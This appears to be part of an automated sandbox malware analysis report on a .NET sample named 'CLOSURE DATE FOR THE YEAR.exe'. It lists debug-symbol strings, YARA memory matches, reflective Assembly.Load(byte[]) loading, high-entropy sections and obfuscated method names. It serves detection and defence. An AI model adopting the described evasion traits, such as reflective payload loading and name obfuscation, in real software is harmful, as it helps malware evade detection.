                Source: Binary string: System.ni.pdbRSDS source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: IOsbBBIDAm.exe, 00000009.00000002.2056533071.00000000008A2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: HP*n0C:\Windows\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056433642.0000000000737000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000008.00000002.2902905606.0000000000E52000.00000002.00000001.01000000.0000000E.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2902905606.0000000000E52000.00000002.00000001.01000000.0000000E.sdmp
                Source: Binary string: System.Configuration.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdbAccessibility.dll source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: System.Xml.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056533071.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, WERA61F.tmp.dmp.16.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: System.Core.ni.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: %%.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056433642.0000000000737000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Roaming\IOsbBBIDAm.PDB. source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056533071.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb8 source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb!v9 source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.VisualBasic.pdbSystem.Windows.Forms.dllSystem.Windows.Forms.dll source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\dll\System.pdb1 source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: mscorlib.pdb ) source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdbDDa source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.ni.pdbRSDS source: WERA61F.tmp.dmp.16.dr

                Data Obfuscation

                barindex
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, jviyFnUkOEMiWAYfmN.cs.Net Code: vYyfjfDEmi System.Reflection.Assembly.Load(byte[])
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3cf1d80.0.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, jviyFnUkOEMiWAYfmN.cs.Net Code: vYyfjfDEmi System.Reflection.Assembly.Load(byte[])
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, jviyFnUkOEMiWAYfmN.cs.Net Code: vYyfjfDEmi System.Reflection.Assembly.Load(byte[])
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.72f0000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: Yara matchFile source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7996, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: IOsbBBIDAm.exe PID: 8056, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00402AC0 push eax; ret 8_2_00402AD4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00402AC0 push eax; ret 8_2_00402AFC
                Source: CLOSURE DATE FOR THE YEAR.exeStatic PE information: section name: .text entropy: 7.674643796191771
                Source: IOsbBBIDAm.exe.0.drStatic PE information: section name: .text entropy: 7.674643796191771
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, g7pDvOofIfvqWkp63rw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fK3c0OZQ3F', 'lZccpdhk56', 'vw6ca0pIrH', 'mJYccCiwd0', 'aGDcAFDSD5', 'z69cZUZKtk', 'd64c9LjkOQ'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, tgq5K1s6GeBooaKkHr.csHigh entropy of concatenated method names: 'ktrlDZ51f4', 'KPClhdDfsW', 'pY6lygk2Mj', 'FXIlT749Q6', 'MUGlRsCk1t', 'OmAlv5KADJ', 'WQglrKebI3', 'K6dlVxPNkb', 'MP7lKKKLsV', 'SunluxKaob'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, z8paIcKHrfZRQqDqsW.csHigh entropy of concatenated method names: 'Wsr0wVMF25', 'kqi0gEqA6H', 'FvX0B3aB5h', 'gO20PdrsbY', 'InW0SRKC52', 'mrP0L3bFYP', 'Lb00drbRJ7', 'lGV0EJcoxi', 'bxH0ejpa7s', 'pnb0I9KBW9'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, hPnrdUD69NejYvVSTw.csHigh entropy of concatenated method names: 'mf18I7NoYW', 'FHJ853x4UC', 'pqr8DmqbXo', 'jtH8hQlVoZ', 'uio8gf9BuN', 'C5T8BD5h8M', 'kPW8PpCnBA', 'X6K8S6kwek', 'AGG8LGJJEN', 'HJ58dgjgRT'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, YUFVMJb03ibTQVxCwX.csHigh entropy of concatenated method names: 'HCPFsNNTjx', 'OxMFXXFDL7', 'dxhFwD4cSa', 'hMdFgY3pCc', 'zhJFPsTUuk', 'xlDFSqjQFO', 'nCgFdNLPgV', 'x9gFEPZAOE', 'upCFIgoik3', 'b3uF1KgDaJ'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, n8h02gia35Fex3cMef.csHigh entropy of concatenated method names: 'UaIq38aZNE', 'Rc0qWpdhR2', 'NSV2BlHJ8b', 'sXR2PCaMDQ', 'iUn2S43rUW', 'pLs2LB775B', 'g1C2ddODYT', 'hGh2EnnQp6', 'dmA2ed2Tg5', 'Dru2I37TXS'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, ra2Pp4P84BlxAjGQIX.csHigh entropy of concatenated method names: 'oWwJ9ZkWCy', 'mDqJQ8WUf5', 'MLGJjrXTYY', 'O5AJGBm8uH', 'uVfJxahfxE', 'GhIJWHfmn6', 'IW3JXV0TAl', 'KMeJiLBRbb', 'Kndkgp25h4UGTjOZL3F', 'xIKBwy2Kku1FKA0DklM'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, KZnRcyw2XS3ZBSeVU9.csHigh entropy of concatenated method names: 'N2wJYbr8ou', 'IrGJl1Gyxk', 'C9bJqZhrls', 'UQ1JMORwcv', 'Sb0JURwMOg', 'DTdqRNojk7', 'NjEqvJV0nV', 'zTjqr0j2II', 'T2oqVW1264', 'Gl3qKqJG5b'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, MJ3rWMvHWVA6OCb5fl.csHigh entropy of concatenated method names: 'uxMkVBWyKb', 'ma3kuBKxFW', 'JXvtm5Gsc3', 'EiFto5X4OA', 'wVgk1UjvMo', 'esbk56rVhY', 'RndkbEsJUu', 'fB9kDQc0Bx', 'AbIkhIAQuA', 'tY2kyWlRT6'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, vt6OdGgtWVkrmoPpyf.csHigh entropy of concatenated method names: 'jpNAwx2Bye0Yi2tbaya', 'NweTip2tRbBEvxVD3Fm', 'xKDJtUPVIN', 'QakJ0auA7R', 'kgnJpllror', 'HYagQQ2QEiDwJkEKIuj', 'J09dcL2ME3XVWa40XhZ', 'wCnToZ2wDEj8i6aWMLN'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, tcTjZnfH2xCKW4Wn2U.csHigh entropy of concatenated method names: 'fAaoMgq5K1', 'lGeoUBooaK', 'HHco61U2Km', 'RbPo7V78h0', 'BcMo8efLZn', 'UcyoH2XS3Z', 'ThBfO1iawoEZ54mBXH', 'fu2cRScrjtd2NDtBiy', 'XHnoogPxvy', 'eN8oCIcrFq'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, iHL0ugXHc1U2KmhbPV.csHigh entropy of concatenated method names: 'a1M2G03DTC', 'sew2xSAuD6', 'vVT2suMmUQ', 'qxt2XKa1cY', 'Ct428tKg66', 'HHb2HmeqbK', 'nNj2khoE4m', 'yje2tjvu9m', 'wTX20gh7uo', 'Q6l2pNbSEI'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, swx3Z7yEPbC2qYGpNs.csHigh entropy of concatenated method names: 'ToString', 'z5DH1YaA2M', 'A8iHg3mIBZ', 'hifHBNWEEU', 'X7LHPytaVe', 'SYDHSUbXhY', 'UP9HLMkuHQ', 'oPsHdTb1S3', 's5yHErbVod', 'k8YHeKZi00'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, J3HuoK4x7sHRBmYd8P.csHigh entropy of concatenated method names: 'DuFj9X9Wi', 'mQeGEFFA9', 'qysx0ESBA', 'CLEWFSLDe', 'YRTXb5MZo', 'WQEiaYn3B', 'wMQFmQVBTMRQbwR7OM', 'U9qlcy5LhVL95ccJFs', 'eEuXwMmtbvZEAlwD0Z', 'q6atPqbcG'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, uS0YNRrX5wLVHg6CLX.csHigh entropy of concatenated method names: 'Sa408YcMXJ', 'LNH0kwUkbC', 'G3o0075fRP', 'BW80amW8kQ', 'BAZ0AX3liP', 'aQv0979cPm', 'Dispose', 'EfvtOmJg8V', 'cmFtluR13O', 'onWt2vL1pG'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, IJ2K90edp4HgKMGk5G.csHigh entropy of concatenated method names: 'cu6MQjT1Wl', 'NN9MNqcW29', 'SlPMjyP45d', 'BnWMGUbjsc', 'P20M3up2qA', 'YebMx2FfQp', 'shnMWL20dY', 'lANMs9MCNb', 'cXZMX0t8Kh', 'zyHMi7kBl7'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, ut7yIPoojS59To19taD.csHigh entropy of concatenated method names: 'YKdpu7WHeo', 'W1mpzohjtJ', 'idsamkLKj9', 'Rl7aoUyWrN', 'p4Ta4QXXNK', 'z5faCHHqZM', 'xdeafK0XLY', 'bD8aYKRhgJ', 'YNiaOEEM27', 'JQTal4XGQ1'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, i0rvbCom5cxEaaFcfVu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FI0p1Cjibd', 'H8mp5YqFlF', 'IippbxDirZ', 'cGypDljnoV', 'M9Xph5HX0x', 'ShSpyhQyv3', 'nY3pTBcRm9'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, msNyQU2nVWMubc2q1n.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pi44KDWbc1', 'GaV4uPm3uv', 'aCp4zeD8tC', 'KR4CmJjDSZ', 'uWECowchEe', 'HA7C4iotwh', 'N3MCCxXIJx', 'NWhQqKIkjl7XCJTV3Fd'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, dxLZjud1Le1aRTLBqp.csHigh entropy of concatenated method names: 'UsZMOePw1V', 'c85M2UdnPK', 'WJSMJdyHmP', 'kpuJuiWrMU', 'jHJJz3VfZJ', 'ReqMmPx8E9', 'tOMMol6iJa', 'mntM4JQPsG', 'DL3MCRBFlF', 'D6TMfy0jxs'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, IIb6nsuCF2hJDVepff.csHigh entropy of concatenated method names: 'txxp24Gh5A', 'iOcpqMQEec', 'j8rpJQ0OsH', 'lAjpMtffXT', 'Kqdp0s12fE', 'C4bpU8y9I4', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, jviyFnUkOEMiWAYfmN.csHigh entropy of concatenated method names: 'gjECY81nYS', 'yQOCOeVYQB', 'h6yClLU1vp', 'n9JC2R9y0m', 'mHmCqOfwam', 'RAiCJaWLVj', 'Qf3CMrFd8n', 'gcNCUlrEb3', 'lfnCnahlOt', 'RfEC6Ix2RZ'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, kNh5SizdpcJ7dyOosl.csHigh entropy of concatenated method names: 'JFcpx5onqD', 'wBipsfSr8t', 'HEBpXSiE4a', 'T2npwLlE5j', 'cERpgMSbFL', 'crHpPgPLO2', 'fTgpSQjwnw', 'CKsp9kOsPL', 'jOUpQoJaj5', 'NPopNPWONn'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, MB18GvlNmXshVsF6VX.csHigh entropy of concatenated method names: 'Dispose', 'GLVoKHg6CL', 'WJf4g5Epmb', 'jXI5ityLne', 'ERqou1wwiC', 'gqoozFk91n', 'ProcessDialogKey', 'y4j4m8paIc', 'prf4oZRQqD', 'isW44PIb6n'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, g7pDvOofIfvqWkp63rw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fK3c0OZQ3F', 'lZccpdhk56', 'vw6ca0pIrH', 'mJYccCiwd0', 'aGDcAFDSD5', 'z69cZUZKtk', 'd64c9LjkOQ'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, tgq5K1s6GeBooaKkHr.csHigh entropy of concatenated method names: 'ktrlDZ51f4', 'KPClhdDfsW', 'pY6lygk2Mj', 'FXIlT749Q6', 'MUGlRsCk1t', 'OmAlv5KADJ', 'WQglrKebI3', 'K6dlVxPNkb', 'MP7lKKKLsV', 'SunluxKaob'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, z8paIcKHrfZRQqDqsW.csHigh entropy of concatenated method names: 'Wsr0wVMF25', 'kqi0gEqA6H', 'FvX0B3aB5h', 'gO20PdrsbY', 'InW0SRKC52', 'mrP0L3bFYP', 'Lb00drbRJ7', 'lGV0EJcoxi', 'bxH0ejpa7s', 'pnb0I9KBW9'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, hPnrdUD69NejYvVSTw.csHigh entropy of concatenated method names: 'mf18I7NoYW', 'FHJ853x4UC', 'pqr8DmqbXo', 'jtH8hQlVoZ', 'uio8gf9BuN', 'C5T8BD5h8M', 'kPW8PpCnBA', 'X6K8S6kwek', 'AGG8LGJJEN', 'HJ58dgjgRT'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, YUFVMJb03ibTQVxCwX.csHigh entropy of concatenated method names: 'HCPFsNNTjx', 'OxMFXXFDL7', 'dxhFwD4cSa', 'hMdFgY3pCc', 'zhJFPsTUuk', 'xlDFSqjQFO', 'nCgFdNLPgV', 'x9gFEPZAOE', 'upCFIgoik3', 'b3uF1KgDaJ'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, n8h02gia35Fex3cMef.csHigh entropy of concatenated method names: 'UaIq38aZNE', 'Rc0qWpdhR2', 'NSV2BlHJ8b', 'sXR2PCaMDQ', 'iUn2S43rUW', 'pLs2LB775B', 'g1C2ddODYT', 'hGh2EnnQp6', 'dmA2ed2Tg5', 'Dru2I37TXS'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, ra2Pp4P84BlxAjGQIX.csHigh entropy of concatenated method names: 'oWwJ9ZkWCy', 'mDqJQ8WUf5', 'MLGJjrXTYY', 'O5AJGBm8uH', 'uVfJxahfxE', 'GhIJWHfmn6', 'IW3JXV0TAl', 'KMeJiLBRbb', 'Kndkgp25h4UGTjOZL3F', 'xIKBwy2Kku1FKA0DklM'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, KZnRcyw2XS3ZBSeVU9.csHigh entropy of concatenated method names: 'N2wJYbr8ou', 'IrGJl1Gyxk', 'C9bJqZhrls', 'UQ1JMORwcv', 'Sb0JURwMOg', 'DTdqRNojk7', 'NjEqvJV0nV', 'zTjqr0j2II', 'T2oqVW1264', 'Gl3qKqJG5b'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, MJ3rWMvHWVA6OCb5fl.csHigh entropy of concatenated method names: 'uxMkVBWyKb', 'ma3kuBKxFW', 'JXvtm5Gsc3', 'EiFto5X4OA', 'wVgk1UjvMo', 'esbk56rVhY', 'RndkbEsJUu', 'fB9kDQc0Bx', 'AbIkhIAQuA', 'tY2kyWlRT6'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, vt6OdGgtWVkrmoPpyf.csHigh entropy of concatenated method names: 'jpNAwx2Bye0Yi2tbaya', 'NweTip2tRbBEvxVD3Fm', 'xKDJtUPVIN', 'QakJ0auA7R', 'kgnJpllror', 'HYagQQ2QEiDwJkEKIuj', 'J09dcL2ME3XVWa40XhZ', 'wCnToZ2wDEj8i6aWMLN'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, tcTjZnfH2xCKW4Wn2U.csHigh entropy of concatenated method names: 'fAaoMgq5K1', 'lGeoUBooaK', 'HHco61U2Km', 'RbPo7V78h0', 'BcMo8efLZn', 'UcyoH2XS3Z', 'ThBfO1iawoEZ54mBXH', 'fu2cRScrjtd2NDtBiy', 'XHnoogPxvy', 'eN8oCIcrFq'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, iHL0ugXHc1U2KmhbPV.csHigh entropy of concatenated method names: 'a1M2G03DTC', 'sew2xSAuD6', 'vVT2suMmUQ', 'qxt2XKa1cY', 'Ct428tKg66', 'HHb2HmeqbK', 'nNj2khoE4m', 'yje2tjvu9m', 'wTX20gh7uo', 'Q6l2pNbSEI'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, swx3Z7yEPbC2qYGpNs.csHigh entropy of concatenated method names: 'ToString', 'z5DH1YaA2M', 'A8iHg3mIBZ', 'hifHBNWEEU', 'X7LHPytaVe', 'SYDHSUbXhY', 'UP9HLMkuHQ', 'oPsHdTb1S3', 's5yHErbVod', 'k8YHeKZi00'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, J3HuoK4x7sHRBmYd8P.csHigh entropy of concatenated method names: 'DuFj9X9Wi', 'mQeGEFFA9', 'qysx0ESBA', 'CLEWFSLDe', 'YRTXb5MZo', 'WQEiaYn3B', 'wMQFmQVBTMRQbwR7OM', 'U9qlcy5LhVL95ccJFs', 'eEuXwMmtbvZEAlwD0Z', 'q6atPqbcG'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, uS0YNRrX5wLVHg6CLX.csHigh entropy of concatenated method names: 'Sa408YcMXJ', 'LNH0kwUkbC', 'G3o0075fRP', 'BW80amW8kQ', 'BAZ0AX3liP', 'aQv0979cPm', 'Dispose', 'EfvtOmJg8V', 'cmFtluR13O', 'onWt2vL1pG'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, IJ2K90edp4HgKMGk5G.csHigh entropy of concatenated method names: 'cu6MQjT1Wl', 'NN9MNqcW29', 'SlPMjyP45d', 'BnWMGUbjsc', 'P20M3up2qA', 'YebMx2FfQp', 'shnMWL20dY', 'lANMs9MCNb', 'cXZMX0t8Kh', 'zyHMi7kBl7'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, ut7yIPoojS59To19taD.csHigh entropy of concatenated method names: 'YKdpu7WHeo', 'W1mpzohjtJ', 'idsamkLKj9', 'Rl7aoUyWrN', 'p4Ta4QXXNK', 'z5faCHHqZM', 'xdeafK0XLY', 'bD8aYKRhgJ', 'YNiaOEEM27', 'JQTal4XGQ1'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, i0rvbCom5cxEaaFcfVu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FI0p1Cjibd', 'H8mp5YqFlF', 'IippbxDirZ', 'cGypDljnoV', 'M9Xph5HX0x', 'ShSpyhQyv3', 'nY3pTBcRm9'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, msNyQU2nVWMubc2q1n.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pi44KDWbc1', 'GaV4uPm3uv', 'aCp4zeD8tC', 'KR4CmJjDSZ', 'uWECowchEe', 'HA7C4iotwh', 'N3MCCxXIJx', 'NWhQqKIkjl7XCJTV3Fd'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, dxLZjud1Le1aRTLBqp.csHigh entropy of concatenated method names: 'UsZMOePw1V', 'c85M2UdnPK', 'WJSMJdyHmP', 'kpuJuiWrMU', 'jHJJz3VfZJ', 'ReqMmPx8E9', 'tOMMol6iJa', 'mntM4JQPsG', 'DL3MCRBFlF', 'D6TMfy0jxs'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, IIb6nsuCF2hJDVepff.csHigh entropy of concatenated method names: 'txxp24Gh5A', 'iOcpqMQEec', 'j8rpJQ0OsH', 'lAjpMtffXT', 'Kqdp0s12fE', 'C4bpU8y9I4', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, jviyFnUkOEMiWAYfmN.csHigh entropy of concatenated method names: 'gjECY81nYS', 'yQOCOeVYQB', 'h6yClLU1vp', 'n9JC2R9y0m', 'mHmCqOfwam', 'RAiCJaWLVj', 'Qf3CMrFd8n', 'gcNCUlrEb3', 'lfnCnahlOt', 'RfEC6Ix2RZ'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, kNh5SizdpcJ7dyOosl.csHigh entropy of concatenated method names: 'JFcpx5onqD', 'wBipsfSr8t', 'HEBpXSiE4a', 'T2npwLlE5j', 'cERpgMSbFL', 'crHpPgPLO2', 'fTgpSQjwnw', 'CKsp9kOsPL', 'jOUpQoJaj5', 'NPopNPWONn'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, MB18GvlNmXshVsF6VX.csHigh entropy of concatenated method names: 'Dispose', 'GLVoKHg6CL', 'WJf4g5Epmb', 'jXI5ityLne', 'ERqou1wwiC', 'gqoozFk91n', 'ProcessDialogKey', 'y4j4m8paIc', 'prf4oZRQqD', 'isW44PIb6n'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, g7pDvOofIfvqWkp63rw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fK3c0OZQ3F', 'lZccpdhk56', 'vw6ca0pIrH', 'mJYccCiwd0', 'aGDcAFDSD5', 'z69cZUZKtk', 'd64c9LjkOQ'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, tgq5K1s6GeBooaKkHr.csHigh entropy of concatenated method names: 'ktrlDZ51f4', 'KPClhdDfsW', 'pY6lygk2Mj', 'FXIlT749Q6', 'MUGlRsCk1t', 'OmAlv5KADJ', 'WQglrKebI3', 'K6dlVxPNkb', 'MP7lKKKLsV', 'SunluxKaob'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, z8paIcKHrfZRQqDqsW.csHigh entropy of concatenated method names: 'Wsr0wVMF25', 'kqi0gEqA6H', 'FvX0B3aB5h', 'gO20PdrsbY', 'InW0SRKC52', 'mrP0L3bFYP', 'Lb00drbRJ7', 'lGV0EJcoxi', 'bxH0ejpa7s', 'pnb0I9KBW9'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, hPnrdUD69NejYvVSTw.csHigh entropy of concatenated method names: 'mf18I7NoYW', 'FHJ853x4UC', 'pqr8DmqbXo', 'jtH8hQlVoZ', 'uio8gf9BuN', 'C5T8BD5h8M', 'kPW8PpCnBA', 'X6K8S6kwek', 'AGG8LGJJEN', 'HJ58dgjgRT'
